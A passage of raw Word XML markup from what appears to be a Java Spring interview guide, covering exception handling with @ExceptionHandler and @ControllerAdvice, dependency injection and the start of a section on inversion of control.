      <w:bookmarkEnd w:id="439"/>
    </w:p>
    <w:p w14:paraId="352EDF55" w14:textId="766B814C" w:rsidR="00CB783B" w:rsidRPr="00CE4B95"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ExceptionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB2FE3F"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You can write a method annotated with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ExceptionHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> inside your controller to catch and handle specific exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C507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15C3531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7161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F6179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id}"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF3C309"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th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E2B0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ID"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A15CF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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B7531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B8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2E17ED"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F58C4F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del</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8A6C0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ttribu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485F89C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35A8C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BCF55" w14:textId="159FE635"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08B95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49" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBB6A30"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2. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Global Exception Handling with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>@ControllerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE5B1FD"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his is used to apply exception handling across multiple controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE995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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@ControllerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D319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lobalExceptionHand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33396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2EFBD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5F7F460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AllException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DBDB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533B5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58186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3AEB70E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671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3FEA5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F0CF6B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ResourceNotFou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1F41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404-page"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDF05B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15EBA0D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0B8529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A448" w14:textId="1FCE363D"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70394864"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50" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="609B208F"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ResponseStatus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3CEE1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You can associate a custom exception with an HTTP status code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D47F1DE"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6666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@ResponseStatu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tat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_F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a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Not Found"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C16978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NotFoun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5741B" w14:textId="150F7AE6"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EDAD7F3"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51" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C9B4484"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4. </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Custom Error Page via </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>web.xml</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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In Spring Boot, you can create </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>error.html</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error.jsp</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resources/templates</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webapp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BE75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color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;!-- error.html --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB43FD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h2&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>An error occurred!</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F05D1D" w14:textId="6062CF83"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p</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th:text</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rror}"&gt;&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="451AF3AF"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52" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="36036248"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ErrorController</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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o customize the default error handling in Spring Boot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F1113F" w14:textId="77777777" w:rsidR="009D7561" w:rsidRPr="00CE4B95" w:rsidRDefault="009D7561" w:rsidP="008944F0">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DFA545B"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troller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07831DD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ustom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BD76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22992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p>
    <w:p w14:paraId="4159484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5A1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tom-error"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39726B3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DB6BF" w14:textId="1578EF21"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ADCD2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53" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A47C9A"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CE4B95" w14:paraId="2642CF9B" w14:textId="77777777" w:rsidTr="008944F0">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="724D108F"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11813E61"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8944F0" w:rsidRPr="00CE4B95" w14:paraId="05B4E421" w14:textId="77777777" w:rsidTr="008944F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C2321E8"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ontroller-specific exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008944F0" w:rsidRPr="00CE4B95" w14:paraId="58DD26E3" w14:textId="77777777" w:rsidTr="008944F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="07A07A71"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Global exception handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008944F0" w:rsidRPr="00CE4B95" w14:paraId="393331F5" w14:textId="77777777" w:rsidTr="008944F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3729A590"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Map custom exceptions to status codes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008944F0" w:rsidRPr="00CE4B95" w14:paraId="008A3BB7" w14:textId="77777777" w:rsidTr="008944F0">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C1056DF"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ustomize Spring Boot default error page</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="52218DD5"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54" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24CBACDE" w14:textId="35F27BE5" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="440" w:name="_Toc197867654"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Spring Dependency Injection</w:t>
      </w:r>
      <w:r w:rsidR="00265B92" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (DI)? How is it implemented in Spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="440"/>
    </w:p>
    <w:p w14:paraId="0CC4C51A" w14:textId="6856ACA1" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="003A427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is a design pattern in which an object’s dependencies are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>injected</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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imple terms:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC8281F" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95" w:rsidRDefault="0005728C" w:rsidP="00397481">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55" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B91057"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Dependency Injection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B4D251"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loose coupling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F538CE"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kes code more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>tes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le</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47910656"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principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21ACE05E"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56" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="002848CC"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Spring Implements Dependency Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D7B0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E4B95" w14:paraId="35638AFF" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7CE46E03"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05728C" w:rsidRPr="00CE4B95" w14:paraId="242E7E64" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="46D82237"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provided via constructor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="22D19141" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="26B38BFC"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set via setters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5CBE34A4"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57" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F6631B"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 Constructor Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616F80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0DB2F18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E8763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0B582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Data"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F425B1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C4EC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57EE1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556C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303ADD4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764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1EF6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A7AE6D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F783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D8DEF0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187D2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7B86C45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27491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2D0C7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451CB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ata</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6B2A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B6731" w14:textId="3B615E99"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085985"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 Setter Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6429E79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6A595B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6C96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08F2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T Department"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D10953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388AB0"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D4E8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29E9DB"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17FD507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050A9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7464D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444DCDF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E2931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4A31621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Rep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8E22D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EDB7B4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163A1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BEC37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DA0E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epartment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF243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4D128B" w14:textId="7E203193"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7A0C2BD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58" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF9DDB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DI with XML (Legacy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF3096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Service"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FBCD5B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constructor-arg</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ref</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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6090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gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558E744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6FE6CE" w14:textId="76295E9A"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Repository"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6A66AD"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59" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF1D626"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E4B95" w14:paraId="489333F0" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BB14320"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05728C" w:rsidRPr="00CE4B95" w14:paraId="2AF791E6" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="523C522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lass as a Spring bean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="4ABE9ED3" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76A4FBF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alized version of @Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="6663E7E8" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DDFD4D4"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DAO layers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="591DC0B9" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21C499E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 automatically</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="608E35BF" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65774EA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ambiguity when multiple beans</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0005728C" w:rsidRPr="00CE4B95" w14:paraId="3C673BA2" w14:textId="77777777" w:rsidTr="0005728C">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AB0BEDF"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ives to @Autowired (from JSR)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5F679B6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60" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C0B6CD"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03192CB"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manages your object dependencies via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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D931B0"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efine how components interact, and Spring </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>wires</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> them together.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5412C4"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ight coupling and improves code reusability and testability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7760BD45" w14:textId="77777777" w:rsidR="0005728C" w:rsidRPr="00CE4B95"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61" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5E7913" w14:textId="77777777" w:rsidR="00D77330" w:rsidRPr="00CE4B95" w:rsidRDefault="00D77330" w:rsidP="00D77330">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="441" w:name="_Toc197867655"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Spring Inversion of Control (IOC)?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="441"/>
    </w:p>
    <w:p w14:paraId="062927C2" w14:textId="3265B44E" w:rsidR="00A250AB" w:rsidRPr="00CE4B95" w:rsidRDefault="00A250AB" w:rsidP="0054541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is a principle where the control of object creation and dependency management is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>inverted</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the application code to the </w:t>
      </w:r>
